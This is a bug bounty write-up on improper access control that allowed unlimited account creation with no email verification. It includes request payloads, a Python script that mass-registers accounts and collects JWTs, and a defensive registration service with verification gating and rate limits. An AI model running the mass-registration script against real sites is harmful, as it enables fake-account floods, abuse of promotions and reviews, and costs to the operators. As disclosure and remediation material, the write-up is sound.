
Introduction
During my bug bounty hunting journey, I was testing a web platform when I discovered a significant vulnerability in their user registration system. The application allowed anyone to create an unlimited number of accounts without any email verification or proper access controls.
This write-up details how I found the issue, the technical flow behind it, and why it matters.
Note: All sensitive identifiers, endpoints, and the program name have been redacted in this public write-up.
Discovery
While exploring the signup feature of the platform, I noticed that the frontend was making several API calls to the backend. Instead of the usual single registration request, the application was using a multi-step flow involving authorization codes and token exchange.
This unusual design made me curious. I started intercepting the requests using Burp Suite and quickly realized that the backend was not enforcing critical security checks.
Vulnerability Details
The core issue was Improper Access Control on the account registration pipeline. The application exposed backend endpoints that allowed:
- Account creation without email verification
- Immediate issuance of a valid JWT, with no verification step between registration and an authenticated session
- No strong server-side restrictions on mass registration
The Registration Flow:
The vulnerable flow consisted of four simple API requests:
1. OPTIONS /Register
Preflight request (returned 204 No Content)
2. POST /Register
This is where the magic happened. A sample payload looked like this:
{
  "email": "[email protected]",
  "password": "Test1234",
  "optedInForEmails": false,
  "websiteShortCode": "GT",
  "fingerprint": "...",
  "clientId": "...",
  "redirectUrl": "https://target.com/",
  "validationCode": "...",
  "nonce": "..."
}

The response returned:
- success: true
- an authorizationCode
3. OPTIONS /AuthorizeCode
Another preflight request.
4. POST /AuthorizeCode
By simply passing the authorizationCode received in step 2:
{
  "authorizationCode": "xxxxxxxxxxxxxxxxxxxxxxxx",
  "clientId": "...",
  "validationCode": "..."
}

The server responded with a valid JWT.
At this point, the account was fully created and usable. I could immediately log in using the email and password provided in the registration step, without ever receiving or clicking a verification email.
Proof of Concept
I automated the entire process by writing a Python script (poc.py).
How the script works:
- It loops through multiple email addresses (e.g., [email protected], [email protected], etc.)
- For each email, it performs the 4-step registration flow
- Extracts the authorizationCode from the registration response
- Exchanges it for a valid JWT token
- Saves the account credentials and token
Using this automation, I was able to create dozens of fully functional accounts in a short time.
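As an added illustration (not the author's poc.py, which was not published), here is a Python reconstruction of the flow above. The host, the `token` field in the /AuthorizeCode response, and the placeholder defaults for clientId, validationCode, nonce and fingerprint are assumptions, since the write-up redacted the real values. It skips the two OPTIONS requests because those are CORS preflights the browser sends, not server-side steps, and it ships with a constructed in-memory backend that behaves as described so it runs offline; swap in `urllib_poster()` to point it at a live host.

```python
import base64
import json
import urllib.request
from typing import Callable, Dict, List, Optional

# Hypothetical host and paths: the real endpoints were redacted in the write-up.
BASE_URL = "https://target.example"
REGISTER_PATH = "/Register"
AUTHORIZE_PATH = "/AuthorizeCode"

# A Poster sends one JSON body to a path and returns the decoded JSON reply.
Poster = Callable[[str, Dict], Dict]


def urllib_poster(base_url: str = BASE_URL) -> Poster:
    """Real transport on the standard library only; use this against a live host."""
    def post(path: str, payload: Dict) -> Dict:
        req = urllib.request.Request(
            base_url + path, data=json.dumps(payload).encode(),
            headers={"Content-Type": "application/json"}, method="POST")
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.loads(resp.read().decode())
    return post


def fake_vulnerable_backend() -> Poster:
    """Constructed stand-in for the backend the write-up describes: any email is accepted,
    an authorizationCode is issued at once and swaps for a JWT with no verification step.
    The unsigned 'alg: none' demo token and the 'token' field name are assumptions."""
    pending: Dict[str, str] = {}  # authorizationCode -> email
    issued = 0

    def b64(obj: Dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

    def post(path: str, payload: Dict) -> Dict:
        nonlocal issued
        if path == REGISTER_PATH:
            issued += 1
            code = f"code-{issued:06d}"
            pending[code] = payload["email"]
            return {"success": True, "authorizationCode": code}
        if path == AUTHORIZE_PATH:
            email = pending.pop(payload.get("authorizationCode"), None)
            if email is None:
                return {"success": False}
            return {"success": True, "token": f"{b64({'alg': 'none', 'typ': 'JWT'})}.{b64({'sub': email})}."}
        return {"success": False}
    return post


def register_account(email, password, post, client_id="...", validation_code="...",
                     nonce="...", fingerprint="...") -> Optional[Dict]:
    """Steps 2 and 4 of the flow. The OPTIONS preflights (steps 1 and 3) are CORS checks
    the browser sends; they change no server state, so a script can skip them."""
    reg = post(REGISTER_PATH, {
        "email": email, "password": password, "optedInForEmails": False,
        "websiteShortCode": "GT", "fingerprint": fingerprint, "clientId": client_id,
        "redirectUrl": BASE_URL + "/", "validationCode": validation_code, "nonce": nonce,
    })
    if not reg.get("success") or not reg.get("authorizationCode"):
        return None  # no code, no account
    auth = post(AUTHORIZE_PATH, {
        "authorizationCode": reg["authorizationCode"],
        "clientId": client_id, "validationCode": validation_code,
    })
    token = auth.get("token")  # field name assumed; the write-up only says 'a valid JWT'
    return {"email": email, "password": password, "token": token} if token else None


def jwt_claims(token: str) -> Dict:
    """Decode the JWT payload without checking the signature, just to see what the
    server minted for an address nobody ever confirmed."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


def mass_register(emails: List[str], password: str, post: Poster) -> List[Dict]:
    """The loop from poc.py: one full flow per address, keeping each account that got a JWT."""
    results = (register_account(e, password, post) for e in emails)
    return [acct for acct in results if acct]


if __name__ == "__main__":
    # Offline demo against the constructed backend; swap in urllib_poster() for a live host.
    created = mass_register([f"test{i}@example.com" for i in range(1, 6)], "Test1234",
                            fake_vulnerable_backend())
    with open("accounts.json", "w") as fh:
        json.dump(created, fh, indent=2)
    for acct in created:
        print(acct["email"], "->", jwt_claims(acct["token"]))
```

Because every account is born with a JWT, the only thing between an attacker and thousands of accounts is network throughput; adding threads or an async client to this loop is trivial, which is why the impact section below is not hypothetical.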
Impact
If left unpatched, this vulnerability could allow an attacker to:
- Create thousands of fake accounts rapidly
- Cause database bloat and increased infrastructure costs
- Abuse platform features (reviews, promotions, referrals, etc.)
- Bypass other business-logic restrictions that assume one account per person (per-account limits, free trials, one-vote rules)
This is a classic example of how missing server-side controls in critical flows can lead to serious abuse.
Conclusion
This vulnerability was discovered by me and my friend Kazi Sabbir while testing the platform’s registration flow. It started as a simple observation but turned into an interesting case of Improper Access Control that allowed unlimited account creation without email verification.
Finding such issues reminds us how critical it is to enforce strong server-side validations, especially on core functionalities like user registration.
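To make that last point concrete, here is an added example (not code from the program or the author) of the server-side shape that closes this class of bug: registration stores the account as unverified and returns the same generic reply for new and existing addresses, a signed JWT is only minted by login after the emailed token has been confirmed, and a per-IP hourly cap bounds mass signups. The in-memory store, the hand-rolled HS256 signer, the PBKDF2 password hashing and the limits are assumptions chosen for illustration; a production service would use a vetted JWT library and a shared rate-limit store.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

VERIFY_TTL = 24 * 3600      # emailed verification tokens expire after a day (assumed policy)
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def check_password(password: str, stored: str) -> bool:
    salt_hex = stored.split("$")[0]
    return hmac.compare_digest(hash_password(password, bytes.fromhex(salt_hex)), stored)


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def issue_jwt(claims: Dict, secret: bytes) -> str:
    """Minimal HS256 JWT for the demo; a real service would use a vetted library."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64(sig)}"


def verify_jwt(token: str, secret: bytes) -> Optional[Dict]:
    """Return the claims only if the HS256 signature checks out, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    expected = hmac.new(secret, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64(expected), parts[2]):
        return None
    return json.loads(base64.urlsafe_b64decode(parts[1] + "=" * (-len(parts[1]) % 4)))


@dataclass
class Account:
    email: str
    password_hash: str
    verified: bool = False
    verify_token: Optional[str] = None
    verify_issued: float = 0.0


class RegistrationService:
    """Registration that never hands out a session until the address is confirmed."""

    def __init__(self, max_per_ip_per_hour: int = 5, now=time.time):
        self.secret = secrets.token_bytes(32)          # JWT signing key
        self.accounts: Dict[str, Account] = {}        # in-memory store (assumption)
        self.ip_hits: Dict[str, List[float]] = {}     # sliding-window rate limit per IP
        self.outbox: List[Tuple[str, str]] = []       # (email, token) the mailer would send
        self.max_per_ip = max_per_ip_per_hour
        self.now = now

    def _rate_limited(self, ip: str) -> bool:
        recent = [t for t in self.ip_hits.get(ip, []) if t > self.now() - 3600]
        self.ip_hits[ip] = recent
        return len(recent) >= self.max_per_ip

    def register(self, email: str, password: str, ip: str) -> Dict:
        email = email.strip().lower()
        if self._rate_limited(ip):
            return {"success": False, "error": "rate_limited"}
        self.ip_hits.setdefault(ip, []).append(self.now())
        if email not in self.accounts:   # same reply either way, so no email enumeration
            token = secrets.token_urlsafe(32)
            self.accounts[email] = Account(email, hash_password(password),
                                           verify_token=token, verify_issued=self.now())
            self.outbox.append((email, token))
        return {"success": True, "message": "check your inbox"}   # no code, no JWT

    def verify(self, email: str, token: str) -> bool:
        acct = self.accounts.get(email.strip().lower())
        if (acct is None or acct.verify_token is None
                or self.now() - acct.verify_issued > VERIFY_TTL
                or not hmac.compare_digest(acct.verify_token, token)):
            return False
        acct.verified, acct.verify_token = True, None
        return True

    def login(self, email: str, password: str) -> Optional[str]:
        acct = self.accounts.get(email.strip().lower())
        if acct is None or not acct.verified or not check_password(password, acct.password_hash):
            return None
        return issue_jwt({"sub": acct.email, "iat": int(self.now())}, self.secret)
```

The contrast with the vulnerable flow is in `register`: it returns neither an authorizationCode nor a token, so an automated loop can still fill the table with unverified rows up to the per-IP cap, but none of them can log in, post reviews or redeem referrals until someone proves control of the mailbox. Pair the IP cap with a per-domain or per-device cap and a background job that purges unverified rows past VERIFY_TTL, and the database-bloat impact described above is bounded as well.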
How I Found Unlimited Account Creation Vulnerability Due to Improper Access Control was originally published in System Weakness on Medium.